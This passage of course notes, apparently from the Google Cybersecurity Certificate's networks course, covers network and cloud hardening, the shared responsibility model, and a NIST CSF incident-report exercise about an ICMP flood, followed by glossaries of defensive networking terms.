analysts often work in a Security Operations Center (SOC) where they can monitor the activity across
the network. They can then use their expertise and experience to determine how to respond to the
information on the dashboard and decide when the events meet the criteria to be escalated to oversight.
Key takeaways
Each of these devices or tools cost money to purchase, install, and maintain. An organization might need
to hire additional personnel to monitor the security tools, as in the case of a SIEM. Decision-makers are
tasked with selecting the appropriate level of security based on cost and risk to the organization. You
will learn more about choosing levels of security later in the course.
Activity Overview
In this activity, you will be presented with a scenario about a social media organization that recently
experienced a major data breach caused by undetected vulnerabilities. To address the breach, you will
identify some common network hardening tools that can be implemented to protect the organization’s
overall security. Then, you will select a specific vulnerability that the company has and propose different
network hardening methods. Finally, you will explain how the methods and tools you chose will be
effective for managing the vulnerability and how they will prevent potential breaches in the future.
In the course, you learned network hardening and network security-related hardening practices, such as
port filtering, network access privileges, and encryption over networks. Network hardening practices
help organizations monitor potential threats and attacks on their network and prevent some attacks
from occurring. Some hardening practices are implemented every day, while others are executed every
once in a while, such as every other week or once a month. Understanding how to use network
hardening tools and methods will help you better monitor network activity and protect your
organization’s network against various attacks.
Be sure to complete this activity before moving on. The next course item will provide you with a
completed exemplar to compare to your own work.
Scenario
You are a security analyst working for a social media organization. The organization recently
experienced a major data breach, which compromised the safety of their customers’ personal
information, such as names and addresses. Your organization wants to implement strong network
hardening practices that can be performed consistently to prevent attacks and breaches in the future.
After inspecting the organization’s network, you discover four major vulnerabilities. The four
vulnerabilities are as follows:
1.
2.
3.
4.
The organization’s employees' share passwords.
The admin password for the database is set to the default.
The firewalls do not have rules in place to filter traffic coming in and out of the network.
Multifactor authentication (MFA) is not used.
If no action is taken to address these vulnerabilities, the organization is at risk of experiencing another
data breach or other attacks in the future.
In this activity, you will write a security risk assessment to analyze the incident and explain what
methods can be used to further secure the network.
Step 1: Access the template
Link to template: Security risk assessment report
Step 2: Access supporting materials
Link to supporting materials: Network hardening tools
Step 3: Select up to three hardening tools and methods to implement
Think about all of the network hardening tools and methods you have learned about in this
course that can protect the organization’s network from future attacks. What hardening
tasks would be the most effective way to respond to this situation? Write your response in
part one of the worksheet.
Step 4: Provide and explain 1-2 recommendations
You recommended one or two security hardening practices to help prevent this from
occurring again in the future. Explain why the security hardening tool or method selected is
effective for addressing the vulnerability. Here are a couple questions to get you started:
●
●
Why is the recommended security hardening technique effective?
How often does the hardening technique need to be implemented?
Security risk assessment report
Part 1: Select up to three hardening tools and methods to implement
Three hardening tools the organization can use to address the vulnerabilities found
include:
1. Implementing multi-factor authentication (MFA)
2. Setting and enforcing strong password policies
3. Performing firewall maintenance regularly
MFA requires users to use more than one way to identify and verify their credentials
before accessing an application. Some MFA methods include fingerprint scans, ID cards,
pin numbers, and passwords.
Password policies can be refined to include rules regarding password length, a list of
acceptable characters, and a disclaimer to discourage password sharing. They can also
include rules surrounding unsuccessful login attempts, such as the user losing access to
the network after five unsuccessful attempts.
Firewall maintenance entails checking and updating security configurations regularly to
stay ahead of potential threats.
Part 2: Explain your recommendation(s)
Enforcing multi-factor authentication (MFA) will reduce the likelihood that a malicious
actor can access a network through a brute force or related attack. MFA will also make it
more difficult for people within the organization to share passwords. Identifying and
verifying credentials is especially critical among employees with administrator level
privileges on the network. MFA should be enforced regularly.
Creating and enforcing a password policy within the company will make it increasingly
challenging for malicious actors to access the network. The rules that are included in the
password policy will need to be enforced regularly within the organization to help
increase user security.
Firewall maintenance should happen regularly. Firewall rules should be updated
whenever a security event occurs, especially an event that allows suspicious network
traffic into the network. This measure can be used to protect against various DoS and
DDoS attacks.
Key Takeaways
As a security analyst, you may be responsible for initiating network security practices.
Making executive decisions about which tools to use based on what you know about certain
vulnerabilities will be a starting point for helping the organization improve its network
security. Explaining and documenting your decisions as a cybersecurity analyst will help in
the future if the network ever needs to be troubleshooted. It will also help give nontechnical employees buy-in and help them follow security practices, such as multifactor
authentication.
Cloud Hardening
In recent years, many organizations are using network services in the cloud. So in addition to
securing on-premises networks, a security analyst will need to secure cloud networks. In a previous
video, you learned that a cloud network is a collection of servers or computers that stores resources
and data in a remote data center that can be accessed via the internet. They can host company data
and applications using cloud computing to provide on-demand storage, processing power, and data
analytics. Just like regular web servers, cloud servers also require proper maintenance done
through various security hardening procedures. Although cloud servers are hosted by a cloud
service provider, these providers cannot prevent intrusions in the cloud—especially intrusions
from malicious actors, both internal and external to an organization. One distinction between cloud
network hardening and traditional network hardening is the use of a server baseline image for all
server instances stored in the cloud. This allows you to compare data in the cloud servers to the
baseline image to make sure there haven't been any unverified changes. An unverified change could
come from an intrusion in the cloud network. Similar to OS hardening, data and applications on a
cloud network are kept separate depending on their service category. For example, older
applications should be kept separate from newer applications, and software that deals with internal
functions should be kept separate from front-end applications seen by users. Even though the cloud
service provider has a shared responsibility with the organization using their services, there are
still security measures that need to be taken by the organization to make sure their cloud network
is safe. Just like traditional networks, operations in the cloud need to be secured.
I'm Kelsey, I'm a distinguished engineer at Google Cloud. I work on computer platforms and
security related topics. When I was starting, the only jobs I had previous, the only jobs I was
confident were accessible to me were fast food jobs. I wanted a career, I wanted more than just a
job. So when I zoomed out and asked myself, what were my career options? I couldn't think of a
better place in the year 1999 than going into the world of technologies. I mean, on the news people
were lining up for the latest operating system. All the tech people were
the new rock stars. And I remember flipping through the opening jobs or the job openings in the
classified section, and it said anyone that has one of these certifications let
us know because we're hiring. The delta between getting started and getting your first job into that
career that I always wanted, it was $35 away in a certification book. So let's talk about Cloud. So
before the time of Cloud, most companies had their own data center. Imagine it's just you alone in
your house, you can put anything wherever you want. You may choose to never lock the doors on
the inside, it's just you. And for a long time in our industry, that's the way people ran their data
centers. Now, we just call that private Cloud, it's just you there. But Cloud is public. And so the
analogy would be, imagine getting roommates, now you start to think
differently about your stuff. You start to lock things up even while you're inside of the house, and
your security discipline is going to be very different. As more and more companies move into Cloud.
You may just be the person who can help one of those organizations finally make that leap because
they have a professional on their team. All right, so you've gotten the certification, you've gotten the
fundamental skills, how do you make sure that you can use them in the Cloud? I'm going to let you
in a little secret. Go use the Cloud. Go take existing software,
throw it in the Cloud and find all the tools that poke and prod at the thing you just got running and
it's going to tell you where you're weak. Learn those tools because those are the tools that the
professionals use. Learning is a superpower. It gives you the ability to not only get that job that
you've been looking at, but it also gives you the ability to define the next one.
Secure the cloud
Earlier in this course, you were introduced to cloud computing. Cloud computing is a model for allowing
convenient and on-demand network access to a shared pool of configurable computing resources. These
resources can be configured and released with minimal management effort or interaction with the
service provider.
Just like any other IT infrastructure, a cloud infrastructure needs to be secured. This reading will
address some main security considerations that are unique to the cloud and introduce you to the shared
responsibility model used for security in the cloud. Many organizations that use cloud resources and
infrastructure express concerns about the privacy of their data and resources. This concern is addressed
through cryptography and other additional security measures, which will be discussed later in this
course.
Cloud security considerations
Many organizations choose to use cloud services because of the ease of deployment, speed of
deployment, cost savings, and scalability of these options. Cloud computing presents unique security
challenges that cybersecurity analysts need to be aware of.
Identity access management
Identity access management (IAM) is a collection of processes and technologies that helps organizations
manage digital identities in their environment. This service also authorizes how users can use different
cloud resources. A common problem that organizations face when using the cloud is the loose
configuration of cloud user roles. An improperly configured user role increases risk by allowing
unauthorized users to have access to critical cloud operations.
Configuration
The number of available cloud services adds complexity to the network. Each service must be carefully
configured to meet security and compliance requirements. This presents a particular challenge when
organizations perform an initial migration into the cloud. When this change occurs on their network,
they must ensure that every process moved into the cloud has been configured correctly. If network
administrators and architects are not meticulous in correctly configuring the organization’s cloud
services, they could leave the network open to compromise. Misconfigured cloud services are a common
source of cloud security issues.
Attack surface
Cloud service providers (CSPs) offer numerous applications and services for organizations at a low
cost. Every service or application on a network carries its own set of risks and vulnerabilities and
increases an organization’s overall attack surface. An increased attack surface must be compensated for
with increased security measures.
Cloud networks that utilize many services introduce lots of entry points into an organization’s network.
However, if the network is designed correctly, utilizing several services does not introduce more entry
points into an organization’s network design. These entry points can be used to introduce malware onto
the network and pose other security vulnerabilities. It is important to note that CSPs often defer to more
secure options, and have undergone more scrutiny than a traditional on-premises network.
Zero-day attacks
Zero-day attacks are an important security consideration for organizations using cloud or traditional onpremise network solutions. A zero day attack is an exploit that was previously unknown. CSPs are more
likely to know about a zero day attack occurring before a traditional IT organization does. CSPs have
ways of patching hypervisors and migrating workloads to other virtual machines. These methods ensure
the customers are not impacted by the attack. There are also several tools available for patching at the
operating system level that organizations can use.
Zero-day attacks are cyberattacks that target previously unknown vulnerabilities (or "zero-day
vulnerabilities") in software, hardware, or network systems. These vulnerabilities have not been
publicly disclosed, and therefore, there are no patches or fixes available from the software or hardware
vendors. Cybercriminals exploit these vulnerabilities to gain unauthorized access, compromise systems,
steal data, or carry out other malicious activities. Zero-day attacks are particularly dangerous because
they take advantage of security weaknesses for which there are no immediate defenses, giving
organizations little time to respond and protect their systems. Effective cybersecurity practices, such as
regular software updates and vulnerability assessments, are crucial for mitigating the risk of zero-day
attacks.
Visibility and tracking
Network administrators have access to every data packet crossing the network with both on-premise
and cloud networks. They can sniff and inspect data packets to learn about network performance or to
check for possible threats and attacks.
This kind of visibility is also offered in the cloud through flow logs and tools, such as packet mirroring.
CSPs take responsibility for security in the cloud, but they do not allow the organizations that use their
infrastructure to monitor traffic on the CSP’s servers. Many CSPs offer strong security measures to
protect their infrastructure. Still, this situation might be a concern for organizations that are accustomed
to having full access to their network and operations. CSPs pay for third-party audits to verify how
secure a cloud network is and identify potential vulnerabilities. The audits can help organizations
identify whether any vulnerabilities originate from on-premise infrastructure and if there are any
compliance lapses from their CSP.
Things change fast in the cloud
CSPs are large organizations that work hard to stay up-to-date with technology advancements. For
organizations that are used to being in control of any adjustments made to their network, this can be a
potential challenge to keep up with. Cloud service updates can affect security considerations for the
organizations using them. For example, connection configurations might need to be changed based on
the CSP’s updates.
Organizations that use CSPs usually have to update their IT processes. It is possible for organizations to
continue following established best practices for changes, configurations, and other security
considerations. However, an organization might have to adopt a different approach in a way that aligns
with changes made by the CSP.
Cloud networking offers various options that might appear attractive to a small company—options that
they could never afford to build on their own premises. However, it is important to consider that each
service adds complexity to the security profile of the organization, and they will need security personnel
to monitor all of the cloud services.
Shared responsibility model
A commonly accepted cloud security principle is the shared responsibility model. The shared
responsibility model states that the CSP must take responsibility for security involving the cloud
infrastructure, including physical data centers, hypervisors, and host operating systems. The company
using the cloud service is responsible for the assets and processes that they store or operate in the
cloud.
The shared responsibility model ensures that both the CSP and the users agree about where their
responsibility for security begins and ends. A problem occurs when organizations assume that the CSP is
taking care of security that they have not taken responsibility for. One example of this is cloud
applications and configurations. The CSP takes responsibility for securing the cloud, but it is the
organization’s responsibility to ensure that services are configured properly according to the security
requirements of their organization.
Key takeaways
It is essential to know the security considerations that are unique to the cloud and understanding the
shared responsibility model for cloud security. Organizations are responsible for correctly configuring
and maintaining best security practices for their cloud services. The shared responsibility model ensures
that both the CSP and users agree about what the organization is responsible for and what the CSP is
responsible for when securing the cloud infrastructure.
Cryptography and cloud security
Earlier in this course, you were introduced to the concepts of the shared responsibility model and
identity and access management (IAM). Similar to on-premise networks, cloud networks also need to be
secured through a mixture of security hardening practices and cryptography.
This reading will address common cloud security hardening practices, what to consider when
implementing cloud security measures, and the fundamentals of cryptography. Since cloud
infrastructure is becoming increasingly common, it’s important to understand how cloud networks
operate and how to secure them.
Cloud security hardening
There are various techniques and tools that can be used to secure cloud network infrastructure and
resources. Some common cloud security hardening techniques include incorporating IAM, hypervisors,
baselining, cryptography, and cryptographic erasure.
Identity access management (IAM)
Identity access management (IAM) is a collection of processes and technologies that helps organizations
manage digital identities in their environment. This service also authorizes how users can leverage
different cloud resources.
Hypervisors
A hypervisor abstracts the host’s hardware from the operating software environment. There are two
types of hypervisors. Type one hypervisors run on the hardware of the host computer. An example of a
type one hypervisor is VMware®'s EXSi. Type two hypervisors operate on the software of the host
computer. An example of a type two hypervisor is VirtualBox. Cloud service providers (CSPs) commonly
use type one hypervisors. CSPs are responsible for managing the hypervisor and other virtualization
components. The CSP ensures that cloud resources and cloud environments are available, and it
provides regular patches and updates. Vulnerabilities in hypervisors or misconfigurations can lead to
virtual machine escapes (VM escapes). A VM escape is an exploit where a malicious actor gains access to
the primary hypervisor, potentially the host computer and other VMs. As a CSP customer, you will rarely
deal with hypervisors directly.
Hypervisors are software or hardware-based virtualization technologies that enable the creation and
management of multiple virtual machines (VMs) on a single physical host. There are two primary types
of hypervisors:
1. **Type 1 Hypervisor (Bare-Metal Hypervisor):** Type 1 hypervisors run directly on the physical
hardware of a server or host system without the need for an underlying operating system. They provide
a lightweight and efficient virtualization solution, ideal for data centers and cloud environments. Type 1
hypervisors allocate resources directly to VMs, ensuring high performance and isolation between VMs.
2. **Type 2 Hypervisor (Hosted Hypervisor):** Type 2 hypervisors run on top of an existing operating
system as applications. They are typically used for desktop virtualization and development or testing
environments. Type 2 hypervisors are easier to set up but may introduce some performance overhead
because they rely on the host operating system's resources.
In both cases, hypervisors create a layer of abstraction that allows multiple VMs to share the same
physical hardware while remaining isolated from one another. This enables efficient resource
utilization, better hardware consolidation, and the ability to run multiple operating systems and
applications on a single physical server. Hypervisors play a crucial role in modern virtualization and
cloud computing environments.
Baselining
Baselining for cloud networks and operations cover how the cloud environment is configured and set
up. A baseline is a fixed reference point. This reference point can be used to compare changes made to a
cloud environment. Proper configuration and setup can greatly improve the security and performance of
a cloud environment. Examples of establishing a baseline in a cloud environment include: restricting
access to the admin portal of the cloud environment, enabling password management, enabling file
encryption, and enabling threat detection services for SQL databases.
Cryptography in the cloud
Cryptography can be applied to secure data that is processed and stored in a cloud environment.
Cryptography uses encryption and secure key management systems to provide data integrity and
confidentiality. Cryptographic encryption is one of the key ways to secure sensitive data and information
in the cloud.
Encryption is the process of scrambling information into ciphertext, which is not readable to anyone
without the encryption key. Encryption primarily originated from manually encoding messages and
information using an algorithm to convert any given letter or number to a new value. Modern
encryption relies on the secrecy of a key, rather than the secrecy of an algorithm. Cryptography is an
important tool that helps secure cloud networks and data at rest to prevent unauthorized access. You’ll
learn more about cryptography in-depth in an upcoming course.
Cryptographic erasure
Cryptographic erasure is a method of erasing the encryption key for the encrypted data. When
destroying data in the cloud, more traditional methods of data destruction are not as effective. Cryptoshredding is a newer technique where the cryptographic keys used for decrypting the data are
destroyed. This makes the data undecipherable and prevents anyone from decrypting the data. When
crypto-shredding, all copies of the key need to be destroyed so no one has any opportunity to access the
data in the future.
Key Management
Modern encryption relies on keeping the encryption keys secure. Below are the measures you can take
to further protect your data when using cloud applications:
●
●
Trusted platform module (TPM). TPM is a computer chip that can securely store passwords,
certificates, and encryption keys.
Cloud hardware security module (CloudHSM). CloudHSM is a computing device that provides
secure storage for cryptographic keys and processes cryptographic operations, such as
encryption and decryption.
Organizations and customers do not have access to the cloud service provider (CSP) directly, but they
can request audits and security reports by contacting the CSP. Customers typically do not have access to
the specific encryption keys that CSPs use to encrypt the customers’ data. However, almost all CSPs
allow customers to provide their own encryption keys, depending on the service the customer is
accessing. In turn, the customer is responsible for their encryption keys and ensuring the keys remain
confidential. The CSP is limited in how they can help the customer if the customer’s keys are
compromised or destroyed. One key benefit of the shared responsibility model is that the customer is
not entirely responsible for maintenance of the cryptographic infrastructure. Organizations can assess
and monitor the risk involved with allowing the CSP to manage the infrastructure by reviewing a CSPs
audit and security controls. For federal contractors, FEDRAMP provides a list of verified CSPs.
Key takeaways
Cloud security hardening is a critical component to consider when assessing the security of various
public cloud environments and improving the security within your organization. Identity access
management (IAM), correctly configuring a baseline for the cloud environment, securing hypervisors,
cryptography, and cryptographic erasure are all methods to use to further secure cloud infrastructure.
Great work on learning about security hardening! You learned about security hardening and its
importance to an organization's infrastructure. First, we discussed how security hardening
strengthens systems and networks to reduce the likelihood of an attack. Next, we covered the
importance of OS hardening, including patch updates, baseline configurations, and hardware and
software disposal. Then we explored network hardening practices, such as network log analysis
and firewall rule maintenance. Finally, we examined cloud network hardening and the
responsibilities of both organizations and cloud service providers in maintaining security. As a
security analyst, you'll be working with operating systems, on-premise networks, and cloud
networks.
Security Hardening
Glossary terms from module 4
Terms and definitions from Course 3, Module 4
Baseline configuration (baseline image): A documented set of specifications within a system that is used
as a basis for future builds, releases, and updates
Hardware: The physical components of a computer
Multi-factor authentication (MFA): A security measure which requires a user to verify their identity in
two or more ways to access a system or network
Network log analysis: The process of examining network logs to identify events of interest
Operating system (OS): The interface between computer hardware and the user
Patch update: A software and operating system update that addresses security vulnerabilities within a
program or product
Penetration testing (pen test): A simulated attack that helps identify vulnerabilities in systems,
networks, websites, applications, and processes
Security hardening: The process of strengthening a system to reduce its vulnerabilities and attack
surface
Security information and event management (SIEM): An application that collects and analyzes log data to
monitor critical activities for an organization
World-writable file: A file that can be altered by anyone in the world
Portfolio Activity: Use the NIST Cybersecurity Framework to respond to a security
incident
Activity Overview
In this activity, you will use the knowledge you’ve gained about networks throughout this
course to analyze a network incident. You will analyze the situation using the National
Institute of Standards and Technology's Cybersecurity Framework (NIST CSF) and create
an incident report that you can include as part of your cybersecurity portfolio
documentation. The CSF is a voluntary framework that consists of standards, guidelines,
and best practices to manage cybersecurity risk. For a refresher, please review this reading
about NIST frameworks and the five functions of the NIST CSF framework. Creating a
quality cybersecurity incident report and applying the CSF can help you build trust and
improve security practices within your organization.
The CSF is scalable and can be applied in a wide variety of contexts. As you continue to
learn more and refine your understanding of key cybersecurity skills, you can use the
templates provided in this activity in other situations. Knowing how to identify which
security measures to apply in response to business needs will help you determine which
are the best available options when it comes to network security.
Be sure to complete this activity before moving on. The next course item will provide you
with a completed exemplar to compare to your own work. It will also provide an
opportunity for you to answer rubric questions that allow you to reflect on key elements of
your incident analysis.
Scenario
Review the scenario below. Then complete the step-by-step instructions.
You are a cybersecurity analyst working for a multimedia company that offers web design
services, graphic design, and social media marketing solutions to small businesses. Your
organization recently experienced a DDoS attack, which compromised the internal network
for two hours until it was resolved.
During the attack, your organization’s network services suddenly stopped responding due
to an incoming flood of ICMP packets. Normal internal network traffic could not access any
network resources. The incident management team responded by blocking incoming ICMP
packets, stopping all non-critical network services offline, and restoring critical network
services.
The company’s cybersecurity team then investigated the security event. They found that a
malicious actor had sent a flood of ICMP pings into the company’s network through an
unconfigured firewall. This vulnerability allowed the malicious attacker to overwhelm the
company’s network through a distributed denial of service (DDoS) attack.
To address this security event, the network security team implemented:
A new firewall rule to limit the rate of incoming ICMP packets
Source IP address verification on the firewall to check for spoofed IP addresses on
incoming ICMP packets
● Network monitoring software to detect abnormal traffic patterns
● An IDS/IPS system to filter out some ICMP traffic based on suspicious
characteristics
●
●
As a cybersecurity analyst, you are tasked with using this security event to create a plan to
improve your company’s network security, following the National Institute of Standards
and Technology (NIST) Cybersecurity Framework (CSF). You will use the CSF to help you
navigate through the different steps of analyzing this cybersecurity incident and integrate
your analysis into a general security strategy:
●
●
●
●
●
Identify security risks through regular audits of internal networks, systems, devices,
and access privileges to identify potential gaps in security.
Protect internal assets through the implementation of policies, procedures, training
and tools that help mitigate cybersecurity threats.
Detect potential security incidents and improve monitoring capabilities to increase
the speed and efficiency of detections.
Respond to contain, neutralize, and analyze security incidents; implement
improvements to the security process.
Recover affected systems to normal operation and restore systems data and/or
assets that have been affected by an incident.
Step-By-Step Instructions
Step 1: Access the incident report analysis template
To access template for this course item, click the following link and select Use Template.
Link to template:
●
Incident report analysis
Link to supporting materials:
●
●
Applying the NIST CSF
Example of an incident report analysis
Step 2: Identify the type of attack and the systems affected
Think about all of the concepts covered in the course so far and reflect on the scenario to
determine what type of attack occurred and which systems were affected. List this
information in the incident report analysis worksheet in the section titled “Identify.”
Step 3: Protect the assets in your organization from being compromised
Next, you will assess where the organization can improve to further protect its assets. In
this step, you will focus on creating an immediate action plan to respond to the
cybersecurity incident. When creating this plan, reflect on the following question:
●
What systems or procedures need to be updated or changed to further secure the
organization’s assets?
Write your response in the incident report analysis template in the “Protect” section.
Step 4: Determine how to detect similar incidents in the future
It is important to continuously monitor network traffic on network devices to check for
suspicious activity, such as incoming external ICMP packets from non-trusted IP addresses
attempting to pass through the organization’s network firewall.
For this step, consider ways you and your team can monitor and analyze network traffic,
software applications, track authorized versus unauthorized users, and detect any unusual
activity on user accounts. Write your response in the incident response analysis worksheet
in the “Detect” section.
Step 5: Create a response plan for future cybersecurity incidents
After identifying the tools and methods you and your organization have in place for
detecting potential vulnerabilities and threats, create a response plan in the event of a
future incident. This typically happens after the incident occurred and has been resolved by
you and your team. In this case, you will create a response plan for future cybersecurity
incidents. Some items to consider when creating a response plan to any cybersecurity
incident:
How can you and your team contain cybersecurity incidents and affected devices?
What procedures are in place to help you and your team neutralize cybersecurity
incidents?
● What data or information can be used to analyze this incident?
● How can your organization’s recovery process be improved to better handle future
cybersecurity incidents?
●
●
Write your response in the incident report analysis template under the “respond” section.
Step 6: Help your organization recover from the incident
Consider what steps need to be taken to help the organization recover from the
cybersecurity incident. Reflect on all the information you gathered about the incident in the
previous steps to consider which devices, systems, and processes need to be restored and
recovered.
Consider the following questions:
●
●
What information do you need to be able to recover immediately?
What processes are in place to help the organization recover from the incident?
Write your response in the “recover” portion of the worksheet.
What to Include in Your Response
Later, you will have the opportunity to assess your performance using the criteria listed. Be
sure to address the following in your completed activity.
Course 3 incident report analysis
Identifies the type of attack and the systems impacted by the incident
Offers a protection plan against future cybersecurity incidents
Describes detection methods that can be used to identify potential cybersecurity
incidents
● Includes a response plan for the cybersecurity incident and outline for future
cybersecurity incidents
● Outlines recovery plans you and the organization can implement in future
cybersecurity incidents.
●
●
●
Assessment of Exemplar
Compare the exemplar to your completed incident report analysis and incident report.
Review your work using each of the criteria in the exemplar. What did you do well? Where
can you improve? Use your answers to these questions to guide you as you continue to
progress through the program.
Note: The exemplar represents one example of how to complete the activity. Yours may
differ in certain ways. What’s important is that you have an idea of what your incident
analysis should resemble.
The exemplar is accompanied by the activity, and presents a complete incident report
analysis to establish:
●
●
●
●
●
What type of attack occurred, the scope of the incident, and its impact to the
organization
Potential network vulnerabilities and protection measures
Detection tools to monitor and secure the network
How to respond to cybersecurity incidents in the future
Recovery plans to restore normal operations
Wow, we have covered a lot in this course! Let's review everything we've discussed. You learned
about networks, network architecture, and the best practices used by security professionals to
secure a network against security breaches. As we bring this course to a close, let's review what
you've learned about security networks so far. First, we explored
the structure of a network. A security analyst must understand how a network is designed to be
able to identify parts of a network that present vulnerabilities and need to be secured. Next, we
learned about network operations and how they affect the communication of data. Network
protocols determine how the data is transmitted over the network. As communication takes place
over the network, malicious actors may use tactics such as denial of service attacks,
packet sniffing, and IP spoofing. Security analysts employ tools and measures such as firewall rules
to protect against these attacks. We also discussed security hardening. Security hardening is used to
reduce the attack area of a network. This means the attack does not disable an entire network.
Security hardening can be done at the hardware level, the software level, or the network level.
Securing networks is an essential part of a security analyst's duties. Knowledge of a network and its
operations and security practices will ensure that you are successful in your career as a security
analyst. And that brings us to the topic of our next course, which will cover computing basics for
security analysts. In that course, you'll learn how to use the Linux command line to authenticate
and authorize users on the network, and to use S-Q-L, otherwise known as SQL, to communicate
with databases.
Glossary
Cybersecurity
Terms and definitions from Course 3
A
Active packet sniffing: A type of attack where data packets are manipulated in transit
Address Resolution Protocol (ARP): Used to determine the MAC address of the next router
or device to traverse
B
Bandwidth: The maximum data transmission capacity over a network, measured by bits
per second
Baseline configuration: A documented set of specifications within a system that is used as a
basis for future builds, releases, and updates
Bluetooth: Used for wireless communication with nearby physical devices
Botnet: A collection of computers infected by malware that are under the control of a single
threat actor, known as the “bot herder"
C
Cloud-based firewalls: Software firewalls that are hosted by the cloud service provider
Cloud computing: The practice of using remote servers, application, and network services
that are hosted on the internet instead of on local physical devices
Cloud network: A collection of servers or computers that stores resources and data in
remote data centers that can be accessed via the internet
Controlled zone: A subnet that protects the internal network from the uncontrolled zone
D
Data packet: A basic unit of information that travels from one device to another within a
network
Denial of service (DoS) attack: An attack that targets a network or server and floods it with
network traffic
Distributed denial of service (DDoS) attack: A type of denial of service attack that uses
multiple devices or servers located in different locations to flood the target network with
unwanted traffic
Domain Name System (DNS): A networking protocol that translates internet domain names
into IP addresses
E
Encapsulation: A process performed by a VPN service that protects your data by wrapping
sensitive data in other data packets
F
File Transfer Protocol (FTP): Used to transfer files from one device to another over a
network
Firewall: A network security device that monitors traffic to or from your network
Forward proxy server: A server that regulates and restricts a person’s access to the internet
H
Hardware: The physical components of a computer
Hub: A network device that broadcasts information to every device on the network
Hypertext Transfer Protocol (HTTP): An application layer protocol that provides a method
of communication between clients and website servers
Hypertext Transfer Protocol Secure (HTTPS): A network protocol that provides a secure
method of communication between clients and servers
I
Identity and access management (IAM): A collection of processes and technologies that
helps organizations manage digital identities in their environment
IEEE 802.11 (Wi-Fi): A set of standards that define communication for wireless LANs
Internet Control Message Protocol (ICMP): An internet protocol used by devices to tell each
other about data transmission errors across the network
Internet Control Message Protocol (ICMP) flood: A type of DoS attack performed by an
attacker repeatedly sending ICMP request packets to a network server
Internet Protocol (IP): A set of standards used for routing and addressing data packets as
they travel between devices on a network
Internet Protocol (IP) address: A unique string of characters that identifies the location of a
device on the internet
IP spoofing: A network attack performed when an attacker changes the source IP of a data
packet to impersonate an authorized system and gain access to a network
L
Local area network (LAN): A network that spans small areas like an office building, a school,
or a home
M
Media Access Control (MAC) address: A unique alphanumeric identifier that is assigned to
each physical device on a network
Modem: A device that connects your router to the internet and brings internet access to the
LAN
Multi-factor authentication (MFA): A security measure that requires a user to verify their
identity in two or more ways to access a system or network
N
Network: A group of connected devices
Network log analysis: The process of examining network logs to identify events of interest
Network protocols: A set of rules used by two or more devices on a network to describe the
order of delivery of data and the structure of data
Network segmentation: A security technique that divides the network into segments
O
Operating system (OS): The interface between computer hardware and the user
Open systems interconnection (OSI) model: A standardized concept that describes the
seven layers computers use to communicate and send data over the network
On-path attack: An attack where a malicious actor places themselves in the middle of an
authorized connection and intercepts or alters the data in transit
P
Packet sniffing: The practice of capturing and inspecting data packets across a network
Passive packet sniffing: A type of attack where a malicious actor connects to a network hub
and looks at all traffic on the network
Patch update: A software and operating system update that addresses security
vulnerabilities within a program or product
Penetration testing: A simulated attack that helps identify vulnerabilities in systems,
networks, websites, applications, and processes
Ping of death: A type of DoS attack caused when a hacker pings a system by sending it an
oversized ICMP packet that is bigger than 64KB
Port: A software-based location that organizes the sending and receiving of data between
devices on a network
Port filtering: A firewall function that blocks or allows certain port numbers to limit
unwanted communication
Proxy server: A server that fulfills the requests of its clients by forwarding them to other
servers
R
Replay attack: A network attack performed when a malicious actor intercepts a data packet
in transit and delays it or repeats it at another time
Reverse proxy server: A server that regulates and restricts the Internet's access to an
internal server
Router: A network device that connects multiple networks together
S
Secure File Transfer Protocol (SFTP): A secure protocol used to transfer files from one
device to another over a network
Secure shell (SSH): A security protocol used to create a shell with a remote system
Security hardening: The process of strengthening a system to reduce its vulnerabilities and
attack surface
Security information and event management (SIEM): An application that collects and
analyzes log data to monitors critical activities for an organization
Security zone: A segment of a company’s network that protects the internal network from
the internet
Simple Network Management Protocol (SNMP): A network protocol used for monitoring
and managing devices on a network
Smurf attack: A network attack performed when an attacker sniffs an authorized user’s IP
address and floods it with ICMP packets
Speed: The rate at which a device sends and receives data, measured by bits per second
Stateful: A class of firewall that keeps track of information passing through it and
proactively filters out threats
Stateless: A class of firewall that operates based on predefined rules and that does not keep
track of information from data packets
Subnetting: The subdivision of a network into logical groups called subnets
Switch: A device that makes connections between specific devices on a network by sending
and receiving data between them
Synchronize (SYN) flood attack: A type of DoS attack that simulates a TCP/IP connection
and floods a server with SYN packets
T
TCP/IP model: A framework used to visualize how data is organized and transmitted across
a network
Transmission Control Protocol (TCP): An internet communication protocol that allows two
devices to form a connection and stream data
Transmission control protocol (TCP) 3-way handshake: A three-step process used to
establish an authenticated connection between two devices on a network
U
Uncontrolled zone: The portion of the network outside the organization
User Datagram Protocol (UDP): A connectionless protocol that does not establish a
connection between devices before transmissions
V
Virtual Private Network (VPN): A network security service that changes your public IP
address and masks your virtual location so that you can keep your data private when you
are using a public network like the internet
W
Wide Area Network (WAN): A network that spans a large geographic area like a city, state,
or country
Wi-Fi Protected Access (WPA): A wireless security protocol for devices to connect to the
internet
Get started on the next course
Congratulations on completing Course 3 of the Google Cybersecurity Certificate: Connect and Protect:
Networks and Network Security! In this part of the program, you learned about the structure of networks
and how to identify network vulnerabilities. You also explored network operations and how they affect
the communication of data. Next, you discovered some common types of network attacks, their
consequences on an organization, and ways to protect networks against attacks. Lastly, you learned how
to reduce the attack surface of a network by applying various protective measures on a network.
The Google Cybersecurity Certificate has eight courses:
1. Foundations of Cybersecurity — Explore the cybersecurity profession, including significant
events that led to the development of the cybersecurity field and its continued importance to
organizational operations. Learn about entry-level cybersecurity roles and responsibilities.
2. Play It Safe: Manage Security Risks — Identify how cybersecurity professionals use frameworks
and controls to protect business operations, and explore common cybersecurity tools.
3. Connect and Protect: Networks and Network Security — Gain an understanding of network-level
vulnerabilities and how to secure networks. (This is the course you just completed. Well done!)
4. Tools of the Trade: Linux and SQL — Explore foundational computing skills, including
communicating with the Linux operating system through the command line and querying
databases with SQL.
5. Assets, Threats, and Vulnerabilities — Learn about the importance of security controls and
developing a threat actor mindset to protect and defend an organization’s assets from various
threats, risks, and vulnerabilities.
6. Sound the Alarm: Detection and Response — Understand the incident response lifecycle and
practice using tools to detect and respond to cybersecurity incidents.
7. Automate Cybersecurity Tasks with Python — Explore the Python programming language and
write code to automate cybersecurity tasks.
8. Put It to Work: Prepare for Cybersecurity Jobs — Learn about incident classification, escalation,
and ways to communicate with stakeholders. This course closes out the program with tips on
how to engage with the cybersecurity community and prepare for your job search.
Now that you have completed this course, you’re ready to move on to the next course: Tools of the
Trade: Linux and SQL.
Course 4 Tools of the Trade: Linux and SQL — Explore foundational computing skills, including
communicating with the Linux operating system through the command line and querying databases
with SQL.
Hi! Welcome to this course on computing basics for security. My name is Kim, and I work as a
